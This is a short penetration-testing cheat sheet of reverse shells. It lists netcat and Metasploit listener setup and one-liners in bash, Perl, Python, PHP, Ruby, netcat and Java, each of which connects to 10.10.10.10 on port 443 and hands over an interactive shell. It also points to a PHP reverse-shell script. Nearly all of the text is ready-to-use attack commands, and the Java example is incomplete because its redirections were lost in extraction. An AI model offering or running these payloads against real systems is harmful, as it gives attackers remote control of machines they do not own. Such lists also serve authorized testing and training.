Shells / Payloads

Universal listeners

# Netcat

[sudo] rlwrap nc -nvlp <port>

# msf multi/handler

msf(exploit/multi/handler)> set payload path/to/payload

msf(exploit/multi/handler)> set LHOST <ip> # or <interface>

msf(exploit/multi/handler)> set LPORT <port>

Linux

One-liners

# bash

/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/443 0>&1"

# Perl

perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP

php -r '$sock=fsockopen("10.10.10.10",443);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby

ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Netcat : -u for UDP

nc [-u] 10.10.10.10 443 -e /bin/bash

# Netcat without -e : -u for UDP

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [-u] 10.10.10.10 443 > /tmp/f

# Java

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5/dev/tcp/10.10.10.10/443;cat &5 >&5; done"] as String[])  (note: the `<`/`>` redirections of this bash command were stripped as HTML during extraction, so the line is incomplete as shown)

p.waitFor()

Reverse shell scripts

PHP reverse shell available online (the original link target was lost in extraction) or locally at:

/usr/share/webshells/php/php-reverse-shell
